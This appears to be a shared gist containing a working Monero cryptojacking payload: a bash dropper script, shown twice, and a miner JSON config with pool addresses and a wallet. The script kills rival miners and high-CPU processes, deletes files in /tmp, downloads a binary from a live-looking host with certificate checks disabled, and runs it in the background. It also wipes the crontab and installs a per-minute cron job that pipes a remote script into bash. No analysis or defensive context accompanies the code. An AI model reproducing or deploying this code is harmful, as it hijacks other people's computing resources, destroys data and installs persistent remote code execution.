payload for monero crypto miner
#!/bin/bash | |
mkdir /var/tmp | |
chmod 777 /var/tmp | |
pkill -f getty | |
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
pkill -f /usr/bin/.sshd | |
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
rm -rf /var/tmp/j* | |
rm -rf /tmp/j* | |
rm -rf /var/tmp/java | |
rm -rf /tmp/java | |
rm -rf /var/tmp/java2 | |
rm -rf /tmp/java2 | |
rm -rf /var/tmp/java* | |
rm -rf /tmp/java* | |
chmod 777 /var/tmp/sustse | |
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid | |
do | |
kill -9 $procid | |
done | |
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
DIR="/var/tmp" | |
if [ -a "/var/tmp/sustse" ] | |
then | |
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ] | |
then | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
pkill -f wc.conf | |
pkill -f sustse | |
sleep 4 | |
;; | |
esac | |
fi | |
echo "P OK" | |
else | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
else | |
if [ -d "/var/tmp" ] | |
then | |
DIR="/var/tmp" | |
fi | |
echo "P NOT EXISTS" | |
fi | |
if [ -d "/var/tmp/sustse" ] | |
then | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
WGET="wget -O" | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -o"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget -O"; | |
fi | |
f2="www.tionhgjk.com:8220" | |
downloadIfNeed() | |
{ | |
if [ -x "$(command -v md5sum)" ] | |
then | |
if [ ! -f $DIR/sustse ]; then | |
echo "File not found!" | |
download | |
fi | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
sizeBefore=$(du $DIR/sustse) | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -k -o "; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget --no-check-certificate -O "; | |
fi | |
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse | |
download | |
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
if [ -s /usr/bin/curl ]; | |
then | |
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt | |
fi | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download | |
fi | |
} | |
download() { | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse3 $DIR/sustse | |
;; | |
*) | |
echo "sustse wrong" | |
download2 | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download2 | |
fi | |
} | |
download2() { | |
if [ `getconf LONG_BIT` = "64" ] | |
then | |
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2 | |
fi | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse $DIR/sustse3 | |
;; | |
*) | |
echo "sustse wrong" | |
;; | |
esac | |
else | |
echo "No md5sum" | |
fi | |
} | |
judge() { | |
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ]; | |
then | |
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid | |
do | |
kill -9 $procid | |
done | |
downloadIfNeed | |
touch /var/tmp/123 | |
pkill -f /var/tmp/java | |
pkill -f w.conf | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
judge2() { | |
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ]; | |
then | |
downloadIfNeed | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ]; | |
then | |
judge2 | |
else | |
judge | |
fi | |
if crontab -l | grep -q "www.tionhgjk.com:8220" | |
then | |
echo "Cron exists" | |
else | |
crontab -r | |
echo "Cron not found" | |
LDR="wget -q -O -" | |
if [ -s /usr/bin/curl ]; | |
then | |
LDR="curl"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
LDR="wget -q -O -"; | |
fi | |
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab - | |
fi | |
rm -rf /var/tmp/jrm | |
rm -rf /tmp/jrm | |
pkill -f 185.222.210.59 | |
pkill -f 95.142.40.81 | |
pkill -f 192.99.142.232 | |
chmod 777 /var/tmp/sustse | |
crontab -l | sed '/185.222.210.59/d' | crontab - |
#!/bin/bash | |
mkdir /var/tmp | |
chmod 777 /var/tmp | |
pkill -f getty | |
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
pkill -f /usr/bin/.sshd | |
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9 | |
rm -rf /var/tmp/j* | |
rm -rf /tmp/j* | |
rm -rf /var/tmp/java | |
rm -rf /tmp/java | |
rm -rf /var/tmp/java2 | |
rm -rf /tmp/java2 | |
rm -rf /var/tmp/java* | |
rm -rf /tmp/java* | |
chmod 777 /var/tmp/sustse | |
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid | |
do | |
kill -9 $procid | |
done | |
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9 | |
DIR="/var/tmp" | |
if [ -a "/var/tmp/sustse" ] | |
then | |
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ] | |
then | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
pkill -f wc.conf | |
pkill -f sustse | |
sleep 4 | |
;; | |
esac | |
fi | |
echo "P OK" | |
else | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
else | |
if [ -d "/var/tmp" ] | |
then | |
DIR="/var/tmp" | |
fi | |
echo "P NOT EXISTS" | |
fi | |
if [ -d "/var/tmp/sustse" ] | |
then | |
DIR=$(mktemp -d)/var/tmp | |
mkdir $DIR | |
echo "T DIR $DIR" | |
fi | |
WGET="wget -O" | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -o"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget -O"; | |
fi | |
f2="www.tionhgjk.com:8220" | |
downloadIfNeed() | |
{ | |
if [ -x "$(command -v md5sum)" ] | |
then | |
if [ ! -f $DIR/sustse ]; then | |
echo "File not found!" | |
download | |
fi | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
;; | |
*) | |
echo "sustse wrong" | |
sizeBefore=$(du $DIR/sustse) | |
if [ -s /usr/bin/curl ]; | |
then | |
WGET="curl -k -o "; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
WGET="wget --no-check-certificate -O "; | |
fi | |
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse | |
download | |
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
if [ -s /usr/bin/curl ]; | |
then | |
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt | |
fi | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download | |
fi | |
} | |
download() { | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse3 $DIR/sustse | |
;; | |
*) | |
echo "sustse wrong" | |
download2 | |
;; | |
esac | |
else | |
echo "No md5sum" | |
download2 | |
fi | |
} | |
download2() { | |
if [ `getconf LONG_BIT` = "64" ] | |
then | |
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2 | |
fi | |
if [ -x "$(command -v md5sum)" ] | |
then | |
sum=$(md5sum $DIR/sustse | awk '{ print $1 }') | |
echo $sum | |
case $sum in | |
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164) | |
echo "sustse OK" | |
cp $DIR/sustse $DIR/sustse3 | |
;; | |
*) | |
echo "sustse wrong" | |
;; | |
esac | |
else | |
echo "No md5sum" | |
fi | |
} | |
judge() { | |
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ]; | |
then | |
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid | |
do | |
kill -9 $procid | |
done | |
downloadIfNeed | |
touch /var/tmp/123 | |
pkill -f /var/tmp/java | |
pkill -f w.conf | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
judge2() { | |
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ]; | |
then | |
downloadIfNeed | |
chmod +x $DIR/sustse | |
$WGET $DIR/wc.conf http://$f2/wt.conf | |
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 & | |
sleep 5 | |
else | |
echo "Running" | |
fi | |
} | |
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ]; | |
then | |
judge2 | |
else | |
judge | |
fi | |
if crontab -l | grep -q "www.tionhgjk.com:8220" | |
then | |
echo "Cron exists" | |
else | |
crontab -r | |
echo "Cron not found" | |
LDR="wget -q -O -" | |
if [ -s /usr/bin/curl ]; | |
then | |
LDR="curl"; | |
fi | |
if [ -s /usr/bin/wget ]; | |
then | |
LDR="wget -q -O -"; | |
fi | |
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab - | |
fi | |
rm -rf /var/tmp/jrm | |
rm -rf /tmp/jrm | |
pkill -f 185.222.210.59 | |
pkill -f 95.142.40.81 | |
pkill -f 192.99.142.232 | |
chmod 777 /var/tmp/sustse | |
crontab -l | sed '/185.222.210.59/d' | crontab - |
{ | |
"algo": "cryptonight", | |
"api": { | |
"port": 0, | |
"access-token": null, | |
"id": null, | |
"worker-id": null, | |
"ipv6": false, | |
"restricted": true | |
}, | |
"asm": true, | |
"autosave": true, | |
"av": 0, | |
"background": true, | |
"colors": true, | |
"cpu-affinity": null, | |
"cpu-priority": 5, | |
"donate-level": 1, | |
"huge-pages": true, | |
"hw-aes": null, | |
"log-file": null, | |
"max-cpu-usage": 95, | |
"pools": [ | |
{ | |
"url": "192.99.142.251:80", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
}, | |
{ | |
"url": "192.99.142.249:3333", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
}, | |
{ | |
"url": "202.144.193.110:3333", | |
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", | |
"pass": "x", | |
"rig-id": null, | |
"nicehash": false, | |
"keepalive": true, | |
"variant": -1, | |
"tls": false, | |
"tls-fingerprint": null | |
} | |
], | |
"print-time": 60, | |
"retries": 5, | |
"retry-pause": 5, | |
"safe": false, | |
"threads": { | |
"cn": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
], | |
"cn-lite": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
], | |
"cn-heavy": [ | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
}, | |
{ | |
"low_power_mode": 1, | |
"affine_to_cpu": false, | |
"asm": true | |
} | |
] | |
}, | |
"algo-perf": { | |
"cn": 2.0, | |
"cn/2": 2.0, | |
"cn/msr": 2.0, | |
"cn-lite": 2.0, | |
"cn-heavy": 2.0 | |
}, | |
"calibrate-algo": false, | |
"calibrate-algo-time": 10, | |
"user-agent": null, | |
"syslog": false, | |
"watch": false | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment